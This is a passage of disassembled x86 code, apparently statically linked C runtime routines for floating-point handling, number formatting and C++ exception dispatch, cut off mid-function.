; int __cdecl sub_421F28(double,int)
sub_421F28 proc near ; CODE XREF: sub_421FAB+82�p
; sub_421FAB+98�p
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_8]
mov ecx, [ebp+0Eh]
fld [ebp+arg_0]
add eax, 3FEh
and cx, 800Fh
fstp [ebp+var_8]
shl eax, 4
or eax, ecx
mov word ptr [ebp+var_8+6], ax
fld [ebp+var_8]
leave
retn
sub_421F28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421F51 proc near ; CODE XREF: sub_41D055+31�p
; sub_41D19B+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor edx, edx
cmp [ebp+arg_4], 7FF00000h
jnz short loc_421F68
cmp [ebp+arg_0], edx
jnz short loc_421F7A
push 1
jmp short loc_421FA4
; ---------------------------------------------------------------------------
loc_421F68: ; CODE XREF: sub_421F51+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_421F7A
cmp [ebp+arg_0], edx
jnz short loc_421F7A
push 2
jmp short loc_421FA4
; ---------------------------------------------------------------------------
loc_421F7A: ; CODE XREF: sub_421F51+11�j
; sub_421F51+1E�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_421F8D
push 3
jmp short loc_421FA4
; ---------------------------------------------------------------------------
loc_421F8D: ; CODE XREF: sub_421F51+36�j
cmp cx, 7FF0h
jnz short loc_421FA7
test [ebp+arg_4], 7FFFFh
jnz short loc_421FA2
cmp [ebp+arg_0], edx
jz short loc_421FA7
loc_421FA2: ; CODE XREF: sub_421F51+4A�j
push 4
loc_421FA4: ; CODE XREF: sub_421F51+15�j
; sub_421F51+27�j ...
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_421FA7: ; CODE XREF: sub_421F51+41�j
; sub_421F51+4F�j
xor eax, eax
pop ebp
retn
sub_421F51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_421FAB(double,int)
sub_421FAB proc near ; CODE XREF: sub_421BFF+160�p
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
fcomp ds:dbl_427860
push esi
fnstsw ax
sahf
jnz short loc_421FCB
fldz
xor esi, esi
fstp [ebp+var_8]
jmp loc_422061
; ---------------------------------------------------------------------------
loc_421FCB: ; CODE XREF: sub_421FAB+12�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_42203A
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_421FE3
cmp dword ptr [ebp+arg_0], ecx
jz short loc_42203A
loc_421FE3: ; CODE XREF: sub_421FAB+31�j
fld [ebp+arg_0]
fcomp ds:dbl_427860
mov esi, 0FFFFFC03h
fnstsw ax
sahf
jnb short loc_421FFB
push 1
pop eax
jmp short loc_421FFD
; ---------------------------------------------------------------------------
loc_421FFB: ; CODE XREF: sub_421FAB+49�j
xor eax, eax
loc_421FFD: ; CODE XREF: sub_421FAB+4E�j
; sub_421FAB+69�j
test byte ptr [ebp+arg_0+6], 10h
jnz short loc_422016
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_422010
or dword ptr [ebp+arg_0+4], 1
loc_422010: ; CODE XREF: sub_421FAB+5F�j
shl dword ptr [ebp+arg_0], 1
dec esi
jmp short loc_421FFD
; ---------------------------------------------------------------------------
loc_422016: ; CODE XREF: sub_421FAB+56�j
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_422024
or byte ptr [ebp+arg_0+7], 80h
loc_422024: ; CODE XREF: sub_421FAB+73�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_421F28
fstp [ebp+var_8]
add esp, 0Ch
jmp short loc_422061
; ---------------------------------------------------------------------------
loc_42203A: ; CODE XREF: sub_421FAB+28�j
; sub_421FAB+36�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_421F28
mov eax, dword ptr [ebp+arg_0+6]
add esp, 0Ch
fstp [ebp+var_8]
shr eax, 4
and ax, 7FFh
movsx esi, ax
sub esi, 3FEh
loc_422061: ; CODE XREF: sub_421FAB+1B�j
; sub_421FAB+8D�j
mov eax, [ebp+arg_8]
fld [ebp+var_8]
mov [eax], esi
pop esi
leave
retn
sub_421FAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42206C proc near ; CODE XREF: sub_42194C+F6�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fstsw [ebp+var_2]
movsx eax, [ebp+var_2]
leave
retn
sub_42206C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42207A proc near ; CODE XREF: sub_42194C+206�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fnstsw [ebp+var_2]
fnclex
movsx eax, [ebp+var_2]
leave
retn
sub_42207A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422089 proc near ; CODE XREF: sub_41D055+13�p
; sub_41D055+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, eax
and eax, [ebp+arg_0]
not ecx
and ecx, [ebp+var_4]
or ecx, eax
mov [ebp+arg_4], ecx
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_422089 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4220AC proc near ; CODE XREF: sub_421BFF+1D�p
; sub_421BFF+37�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov cl, byte ptr [ebp+arg_0]
test cl, 1
jz short loc_4220C3
fld tbyte_43D408
fistp [ebp+arg_0]
wait
loc_4220C3: ; CODE XREF: sub_4220AC+B�j
test cl, 8
jz short loc_4220D8
fstsw ax
fld tbyte_43D408
fstp [ebp+var_8]
wait
fstsw ax
loc_4220D8: ; CODE XREF: sub_4220AC+1A�j
test cl, 10h
jz short loc_4220E7
fld tbyte_43D414
fstp [ebp+var_8]
wait
loc_4220E7: ; CODE XREF: sub_4220AC+2F�j
test cl, 4
jz short loc_4220F5
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_4220F5: ; CODE XREF: sub_4220AC+3E�j
test cl, 20h
jz short locret_422100
fldpi
fstp [ebp+var_8]
wait
locret_422100: ; CODE XREF: sub_4220AC+4C�j
leave
retn
sub_4220AC endp
; =============== S U B R O U T I N E =======================================
sub_422102 proc near ; CODE XREF: sub_41D124+F�p
push 30000h
push 10000h
call sub_424865
pop ecx
pop ecx
retn
sub_422102 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422114 proc near ; CODE XREF: sub_422152:loc_422176�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_427870
fstp [ebp+var_8]
fld ds:dbl_427868
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp ds:dbl_4276F8
fnstsw ax
sahf
jbe short loc_42214E
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_42214E: ; CODE XREF: sub_422114+33�j
xor eax, eax
leave
retn
sub_422114 endp
; =============== S U B R O U T I N E =======================================
sub_422152 proc near ; CODE XREF: sub_41D124+5�p
push offset aKernel32 ; "KERNEL32"
call ds:dword_4270A4 ; GetModuleHandleA
test eax, eax
jz short loc_422176
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:dword_4270C4 ; GetProcAddress
test eax, eax
jz short loc_422176
push 0
call eax ; sub_41D124
retn
; ---------------------------------------------------------------------------
loc_422176: ; CODE XREF: sub_422152+D�j
; sub_422152+1D�j
jmp sub_422114
sub_422152 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42217B proc near ; CODE XREF: sub_41FF3F+3CB�p
; DATA XREF: sub_41D13C+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_41DFEC
cmp eax, 65h
pop ecx
jz short loc_4221BB
loc_42218F: ; CODE XREF: sub_42217B+3E�j
inc esi
cmp dword_43D084, 1
jle short loc_4221A8
movsx eax, byte ptr [esi]
push 4
push eax
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_4221B7
; ---------------------------------------------------------------------------
loc_4221A8: ; CODE XREF: sub_42217B+1C�j
movsx eax, byte ptr [esi]
mov ecx, off_43CE78
mov al, [ecx+eax*2]
and eax, 4
loc_4221B7: ; CODE XREF: sub_42217B+2B�j
test eax, eax
jnz short loc_42218F
loc_4221BB: ; CODE XREF: sub_42217B+12�j
mov cl, byte_43D088
mov al, [esi]
mov [esi], cl
inc esi
loc_4221C6: ; CODE XREF: sub_42217B+56�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_4221C6
pop esi
retn
sub_42217B endp
; =============== S U B R O U T I N E =======================================
sub_4221D5 proc near ; CODE XREF: sub_41FF3F+3E2�p
; DATA XREF: sub_41D13C+5�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dl, byte_43D088
mov cl, [eax]
test cl, cl
jz short loc_4221F1
loc_4221E5: ; CODE XREF: sub_4221D5+1A�j
cmp cl, dl
jz short loc_4221F1
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_4221E5
loc_4221F1: ; CODE XREF: sub_4221D5+E�j
; sub_4221D5+12�j
mov cl, [eax]
inc eax
test cl, cl
jz short locret_422222
loc_4221F8: ; CODE XREF: sub_4221D5+34�j
mov cl, [eax]
test cl, cl
jz short loc_42220B
cmp cl, 65h
jz short loc_42220B
cmp cl, 45h
jz short loc_42220B
inc eax
jmp short loc_4221F8
; ---------------------------------------------------------------------------
loc_42220B: ; CODE XREF: sub_4221D5+27�j
; sub_4221D5+2C�j ...
mov ecx, eax
loc_42220D: ; CODE XREF: sub_4221D5+3C�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_42220D
cmp [eax], dl
jnz short loc_422218
dec eax
loc_422218: ; CODE XREF: sub_4221D5+40�j
; sub_4221D5+4B�j
mov dl, [ecx]
inc eax
inc ecx
test dl, dl
mov [eax], dl
jnz short loc_422218
locret_422222: ; CODE XREF: sub_4221D5+21�j
retn
sub_4221D5 endp
; =============== S U B R O U T I N E =======================================
sub_422223 proc near ; DATA XREF: sub_41D13C+28�o
; .data:off_43D430�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp ds:dbl_427860
fnstsw ax
sahf
jb short loc_422238
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_422238: ; CODE XREF: sub_422223+F�j
xor eax, eax
retn
sub_422223 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42223B proc near ; CODE XREF: sub_420DB0+430�p
; DATA XREF: sub_41D13C+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_422264
lea eax, [ebp+var_8]
push eax
call sub_424D28
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_422264: ; CODE XREF: sub_42223B+C�j
lea eax, [ebp+arg_8]
push eax
call sub_424D55
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [eax], ecx
leave
retn
sub_42223B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422279 proc near ; CODE XREF: sub_4224F6+17�p
; sub_422540+47�p
var_10 = qword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp byte_4DBE5C, 0
push ebx
push esi
jz short loc_4222AE
mov ebx, [ebp+arg_8]
mov eax, dword_4DBE58
xor ecx, ecx
mov esi, eax
test ebx, ebx
setnle cl
push ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
setz cl
add ecx, [ebp+arg_4]
push ecx
call sub_422591
pop ecx
pop ecx
jmp short loc_4222E6
; ---------------------------------------------------------------------------
loc_4222AE: ; CODE XREF: sub_422279+C�j
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+10h+var_10]
call sub_424DF9
mov ebx, [ebp+arg_8]
mov esi, eax
push esi
mov edx, [ebp+arg_4]
lea eax, [ebx+1]
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
xor ecx, ecx
test ebx, ebx
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_424D82
add esp, 14h
loc_4222E6: ; CODE XREF: sub_422279+33�j
cmp dword ptr [esi], 2Dh
mov eax, [ebp+arg_4]
jnz short loc_4222F2
mov byte ptr [eax], 2Dh
inc eax
loc_4222F2: ; CODE XREF: sub_422279+73�j
test ebx, ebx
jle short loc_42230A
mov cl, [eax+1]
push edi
lea edi, [eax+1]
mov [eax], cl
mov cl, byte_43D088
mov eax, edi
pop edi
mov [eax], cl
loc_42230A: ; CODE XREF: sub_422279+7B�j
xor ecx, ecx
push offset aE000 ; "e+000"
cmp byte_4DBE5C, cl
setz cl
add ecx, eax
add ecx, ebx
push ecx
call sub_41C890
cmp [ebp+arg_C], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_422331
mov byte ptr [ecx], 45h
loc_422331: ; CODE XREF: sub_422279+B3�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_422376
mov ebx, [esi+4]
dec ebx
jns short loc_422345
neg ebx
mov byte ptr [ecx], 2Dh
loc_422345: ; CODE XREF: sub_422279+C5�j
inc ecx
cmp ebx, 64h
jl short loc_42235C
mov eax, ebx
push 64h
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_42235C: ; CODE XREF: sub_422279+D0�j
inc ecx
cmp ebx, 0Ah
jl short loc_422373
mov eax, ebx
push 0Ah
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_422373: ; CODE XREF: sub_422279+E7�j
add [ecx+1], bl
loc_422376: ; CODE XREF: sub_422279+BF�j
mov eax, [ebp+arg_4]
pop esi
pop ebx
pop ebp
retn
sub_422279 endp
; =============== S U B R O U T I N E =======================================
sub_42237D proc near ; CODE XREF: sub_42251D+13�p
; sub_422540+1E�p
var_18 = qword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp byte_4DBE5C, 0
push ebx
push ebp
mov ebp, [esp+8+arg_4]
push esi
push edi
jz short loc_4223B8
mov eax, dword_4DBE60
mov ebx, [esp+10h+arg_8]
mov esi, dword_4DBE58
cmp eax, ebx
jnz short loc_4223E8
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebp
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
jmp short loc_4223E8
; ---------------------------------------------------------------------------
loc_4223B8: ; CODE XREF: sub_42237D+F�j
mov eax, [esp+10h+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+18h+var_18]
call sub_424DF9
mov ebx, [esp+18h+arg_8]
mov esi, eax
push esi
mov eax, [esi+4]
add eax, ebx
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, ebp
push eax
call sub_424D82
add esp, 14h
loc_4223E8: ; CODE XREF: sub_42237D+22�j
; sub_42237D+39�j
cmp dword ptr [esi], 2Dh
mov edi, ebp
jnz short loc_4223F6
mov byte ptr [ebp+0], 2Dh
lea edi, [ebp+1]
loc_4223F6: ; CODE XREF: sub_42237D+70�j
mov eax, [esi+4]
test eax, eax
jg short loc_42240D
push 1
push edi
call sub_422591
pop ecx
mov byte ptr [edi], 30h
pop ecx
inc edi
jmp short loc_42240F
; ---------------------------------------------------------------------------
loc_42240D: ; CODE XREF: sub_42237D+7E�j
add edi, eax
loc_42240F: ; CODE XREF: sub_42237D+8E�j
test ebx, ebx
jle short loc_422454
push 1
push edi
call sub_422591
mov al, byte_43D088
pop ecx
mov [edi], al
mov esi, [esi+4]
inc edi
pop ecx
test esi, esi
jge short loc_422454
cmp byte_4DBE5C, 0
jz short loc_422439
neg esi
jmp short loc_42243F
; ---------------------------------------------------------------------------
loc_422439: ; CODE XREF: sub_42237D+B6�j
neg esi
cmp ebx, esi
jl short loc_422441
loc_42243F: ; CODE XREF: sub_42237D+BA�j
mov ebx, esi
loc_422441: ; CODE XREF: sub_42237D+C0�j
push ebx
push edi
call sub_422591
push ebx
push 30h
push edi
call sub_41BF70
add esp, 14h
loc_422454: ; CODE XREF: sub_42237D+94�j
; sub_42237D+AD�j
pop edi
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_42237D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42245B proc near ; CODE XREF: sub_422540+34�p
var_14 = qword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [edi]
fstp [esp+14h+var_14]
call sub_424DF9
mov dword_4DBE58, eax
mov ecx, [eax+4]
dec ecx
mov ebx, [ebp+arg_8]
mov dword_4DBE60, ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
push eax
push ebx
setz cl
add ecx, [ebp+arg_4]
mov esi, ecx
push esi
call sub_424D82
mov eax, dword_4DBE58
add esp, 14h
mov ecx, [eax+4]
dec ecx
cmp dword_4DBE60, ecx
setl cl
mov byte_4DBE64, cl
mov eax, [eax+4]
dec eax
cmp eax, 0FFFFFFFCh
mov dword_4DBE60, eax
jl short loc_4224E1
cmp eax, ebx
jge short loc_4224E1
test cl, cl
jz short loc_4224D2
loc_4224C8: ; CODE XREF: sub_42245B+72�j
mov al, [esi]
inc esi
test al, al
jnz short loc_4224C8
and [esi-2], al
loc_4224D2: ; CODE XREF: sub_42245B+6B�j
push ebx
push [ebp+arg_4]
push edi
call sub_42251D
add esp, 0Ch
jmp short loc_4224F1
; ---------------------------------------------------------------------------
loc_4224E1: ; CODE XREF: sub_42245B+63�j
; sub_42245B+67�j
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
push edi
call sub_4224F6
add esp, 10h
loc_4224F1: ; CODE XREF: sub_42245B+84�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_42245B endp
; =============== S U B R O U T I N E =======================================
sub_4224F6 proc near ; CODE XREF: sub_42245B+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
mov byte_4DBE5C, 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_422279
and byte_4DBE5C, 0
add esp, 10h
retn
sub_4224F6 endp
; =============== S U B R O U T I N E =======================================
sub_42251D proc near ; CODE XREF: sub_42245B+7C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_8]
mov byte_4DBE5C, 1
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_42237D
and byte_4DBE5C, 0
add esp, 0Ch
retn
sub_42251D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422540 proc near ; CODE XREF: sub_41FF3F+3AA�p
; DATA XREF: sub_41D13C�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_42257B
cmp [ebp+arg_8], 45h
jz short loc_42257B
cmp [ebp+arg_8], 66h
jnz short loc_422568
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42237D
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_422568: ; CODE XREF: sub_422540+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42245B
jmp short loc_42258C
; ---------------------------------------------------------------------------
loc_42257B: ; CODE XREF: sub_422540+7�j
; sub_422540+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_422279
loc_42258C: ; CODE XREF: sub_422540+39�j
add esp, 10h
pop ebp
retn
sub_422540 endp
; =============== S U B R O U T I N E =======================================
sub_422591 proc near ; CODE XREF: sub_422279+2C�p
; sub_42237D+83�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_4]
test edi, edi
jz short loc_4225B4
push esi
mov esi, [esp+8+arg_0]
push esi
call sub_41B9C0
inc eax
push eax
push esi
add esi, edi
push esi
call sub_41D670
add esp, 10h
pop esi
loc_4225B4: ; CODE XREF: sub_422591+7�j
pop edi
retn
sub_422591 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4225B6 proc near ; CODE XREF: .text:0041D31C�p
; sub_41D385+1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, 19930520h
cmp [esi], edi
jz short loc_4225CC
call sub_422E52
loc_4225CC: ; CODE XREF: sub_4225B6+F�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_4225F4
cmp dword ptr [esi+4], 0
jz short loc_42264A
cmp [ebp+arg_14], 0
jnz short loc_42264A
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_4228FD
add esp, 10h
jmp short loc_42264A
; ---------------------------------------------------------------------------
loc_4225F4: ; CODE XREF: sub_4225B6+1D�j
cmp dword ptr [esi+0Ch], 0
jz short loc_42264A
cmp dword ptr [eax], 0E06D7363h
jnz short loc_42262E
cmp [eax+14h], edi
jbe short loc_42262E
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_42262E
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_42264D
; ---------------------------------------------------------------------------
loc_42262E: ; CODE XREF: sub_4225B6+4A�j
; sub_4225B6+4F�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_422651
add esp, 20h
loc_42264A: ; CODE XREF: sub_4225B6+23�j
; sub_4225B6+29�j ...
push 1
pop eax
loc_42264D: ; CODE XREF: sub_4225B6+76�j
pop edi
pop esi
pop ebp
retn
sub_4225B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422651 proc near ; CODE XREF: sub_4225B6+8C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_4]
and byte ptr [ebp+var_14], 0
mov eax, [eax+8]
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jl short loc_422671
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_422676
loc_422671: ; CODE XREF: sub_422651+16�j
call sub_422E52
loc_422676: ; CODE XREF: sub_422651+1E�j
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, 0E06D7363h
push edi
mov edi, 19930520h
cmp [esi], ebx
jnz loc_4227CD
cmp dword ptr [esi+10h], 3
jnz short loc_4226EA
cmp [esi+14h], edi
jnz short loc_4226EA
cmp dword ptr [esi+1Ch], 0
jnz short loc_4226EA
mov esi, dword_4DBE68
test esi, esi
jz loc_4227C8
mov eax, dword_4DBE6C
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_14], 1
call sub_424F80
pop ecx
test eax, eax
pop ecx
jnz short loc_4226CC
call sub_422E52
loc_4226CC: ; CODE XREF: sub_422651+74�j
cmp [esi], ebx
jnz loc_4227CD
cmp dword ptr [esi+10h], 3
jnz short loc_4226EA
cmp [esi+14h], edi
jnz short loc_4226EA
cmp dword ptr [esi+1Ch], 0
jnz short loc_4226EA
call sub_422E52
loc_4226EA: ; CODE XREF: sub_422651+41�j
; sub_422651+46�j ...
cmp [esi], ebx
jnz loc_4227CD
cmp dword ptr [esi+10h], 3
jnz loc_4227CD
cmp [esi+14h], edi
jnz loc_4227CD
mov edi, [ebp+var_10]
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_41D4D3
add esp, 14h
mov ebx, eax
loc_422721: ; CODE XREF: sub_422651+162�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_18]
jnb loc_4227B8
cmp [ebx], edi
jg short loc_4227AD
cmp edi, [ebx+4]
jg short loc_4227AD
mov eax, [ebx+10h]
mov [ebp+arg_0], eax
mov eax, [ebx+0Ch]
test eax, eax
mov [ebp+var_C], eax
jle short loc_4227AA
loc_422746: ; CODE XREF: sub_422651+131�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea edi, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_8], eax
jle short loc_422777
loc_422758: ; CODE XREF: sub_422651+124�j
push dword ptr [esi+1Ch]
push dword ptr [edi]
push [ebp+arg_0]
call sub_4228A0
add esp, 0Ch
test eax, eax
jnz short loc_422786
dec [ebp+var_8]
add edi, 4
cmp [ebp+var_8], eax
jg short loc_422758
loc_422777: ; CODE XREF: sub_422651+105�j
dec [ebp+var_C]
add [ebp+arg_0], 10h
cmp [ebp+var_C], 0
jg short loc_422746
jmp short loc_4227AA
; ---------------------------------------------------------------------------
loc_422786: ; CODE XREF: sub_422651+119�j
push [ebp+var_14]
push [ebp+arg_1C]
push [ebp+arg_18]
push ebx
push dword ptr [edi]
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_4229B1
add esp, 2Ch
loc_4227AA: ; CODE XREF: sub_422651+F3�j
; sub_422651+133�j
mov edi, [ebp+var_10]
loc_4227AD: ; CODE XREF: sub_422651+DE�j
; sub_422651+E3�j
inc [ebp+var_4]
add ebx, 14h
jmp loc_422721
; ---------------------------------------------------------------------------
loc_4227B8: ; CODE XREF: sub_422651+D6�j
cmp [ebp+arg_14], 0
jz short loc_4227C8
push 1
push esi
call sub_422D26
pop ecx
pop ecx
loc_4227C8: ; CODE XREF: sub_422651+56�j
; sub_422651+16B�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4227CD: ; CODE XREF: sub_422651+37�j
; sub_422651+7D�j ...
cmp [ebp+arg_14], 0
jnz short loc_4227F3
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_10]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_4227F8
add esp, 20h
jmp short loc_4227C8
; ---------------------------------------------------------------------------
loc_4227F3: ; CODE XREF: sub_422651+180�j
jmp sub_422DFC
sub_422651 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4227F8 proc near ; CODE XREF: sub_422651+198�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
cmp dword_4DBE70, 0
push esi
push edi
jz short loc_422829
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41D3AA
add esp, 1Ch
test eax, eax
jnz short loc_42289C
loc_422829: ; CODE XREF: sub_4227F8+E�j
mov edi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_41D4D3
add esp, 14h
